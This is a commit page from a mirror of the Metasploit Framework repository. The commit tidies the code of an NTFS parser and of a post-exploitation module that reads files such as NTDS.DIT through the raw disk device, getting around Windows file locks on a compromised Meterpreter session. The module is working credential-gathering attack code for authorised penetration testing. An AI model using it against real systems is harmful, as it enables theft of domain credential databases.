infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Small tidyup

bug/bundler_fix
Meatballs 2015-02-07 11:35:47 +00:00
parent 970c5d115a
commit 358ab2590e
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
2 changed files with 25 additions and 24 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
lib/rex/parser/fs/ntfs.rb
View File

@ -236,7 +236,7 @@ module Rex
def file(path) def file(path)
repertory = mft_record_from_mft_num(5) repertory = mft_record_from_mft_num(5)
index_entry = {} index_entry = {}
for r in path.split('\\') path.split('\\').each do |r|
attributes = mft_record_attribute(repertory) attributes = mft_record_attribute(repertory)
index = index_list_from_attributes(attributes) index = index_list_from_attributes(attributes)
unless index.key?(r) unless index.key?(r)

47
modules/post/windows/gather/file_in_raw_ntfs.rb
View File

@ -3,26 +3,27 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
require 'rex/parser/fs/ntfs'
class Metasploit3 < Msf::Post class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv include Msf::Post::Windows::Priv
require "rex/parser/fs/ntfs"
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Windows File Gathering In Raw NTFS', 'Name' => 'Windows File Gathering In Raw NTFS',
'Description' => %q{ 'Description' => %q(
This module gather file using the raw NTFS device, bypassing some Windows restriction. This module gather file using the raw NTFS device, bypassing some Windows restriction.
Gather file from disk bypassing restriction like already open file with write right lock. Gather file from disk bypassing restriction like already open file with write right lock.
Can be used to retreive file like NTDS.DIT Can be used to retreive file like NTDS.DIT),
},
'License' => 'MSF_LICENSE', 'License' => 'MSF_LICENSE',
'Platform' => ['win'], 'Platform' => ['win'],
'SessionTypes' => ['meterpreter'], 'SessionTypes' => ['meterpreter'],
'Author' => ['Danil Bazin <danil.bazin[at]hsc.fr>'], #@danilbaz 'Author' => ['Danil Bazin <danil.bazin[at]hsc.fr>'], # @danilbaz
'References' => [ 'References' => [
[ 'URL', 'http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/' ] [ 'URL', 'http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/' ]
] ]
)) ))
register_options( register_options(
[ [
OptString.new('FILE_PATH', [true, 'The FILE_PATH to retreive from the Volume raw device', nil]) OptString.new('FILE_PATH', [true, 'The FILE_PATH to retreive from the Volume raw device', nil])
@ -32,46 +33,46 @@ class Metasploit3 < Msf::Post
def run def run
winver = sysinfo["OS"] winver = sysinfo["OS"]
if winver =~ /2000/i fail_with(Exploit::Failure::NoTarget, 'Module not valid for Windows 2000') if winver =~ /2000/
print_error("Module not valid for Windows 2000") fail_with(Exploit::Failure::NoAccess, 'You don\'t have administrative privileges') unless is_admin?
return
end
unless is_admin?
print_error("You don't have enough privileges")
return
end
file_path = datastore['FILE_PATH'] file_path = datastore['FILE_PATH']
r = client.railgun.kernel32.GetFileAttributesA(file_path) r = client.railgun.kernel32.GetFileAttributesA(file_path)
if r['GetLastError'] != 0 if r['GetLastError'] != 0
print_error("The file does not exist, use file format C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts") fail_with(
return nil Exploit::Failure::BadConfig,
'The file does not exist, use file format C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts'
)
end end
drive = file_path[0, 2] drive = file_path[0, 2]
r = client.railgun.kernel32.CreateFileA("\\\\.\\#{drive}", "GENERIC_READ", "FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE", r = client.railgun.kernel32.CreateFileA("\\\\.\\#{drive}",
nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0) 'GENERIC_READ',
'FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE',
nil,
'OPEN_EXISTING',
'FILE_FLAG_WRITE_THROUGH',
0)
if r['GetLastError'] != 0 if r['GetLastError'] != 0
print_error("Error opening #{drive} GetLastError=#{r['ErrorMessage']}") fail_with(
return nil Exploit::Failure::Unknown,
"Error opening #{drive}. Windows Error Code: #{r['GetLastError']} - #{r['ErrorMessage']}")
end end
@handle = r['return'] @handle = r['return']
print_status("Successfuly opened #{drive}") print_status("Successfuly opened #{drive}")
begin begin
fs = Rex::Parser::NTFS.new(self) fs = Rex::Parser::NTFS.new(self)
print_status("Trying gather #{file_path}") print_status("Trying to gather #{file_path}")
path = file_path[3, file_path.length - 3] path = file_path[3, file_path.length - 3]
data = fs.file(path) data = fs.file(path)
file_name = file_path.split("\\")[-1] file_name = file_path.split("\\")[-1]
stored_path = store_loot("windows.file", 'application/octet-stream', session, data, file_name, "Windows file") stored_path = store_loot("windows.file", 'application/octet-stream', session, data, file_name, "Windows file")
print_good("Saving file : #{stored_path}") print_good("Saving file : #{stored_path}")
rescue ::Exception => e
print_error("Post failed : #{e.backtrace}")
ensure ensure
client.railgun.kernel32.CloseHandle(@handle) client.railgun.kernel32.CloseHandle(@handle)
end end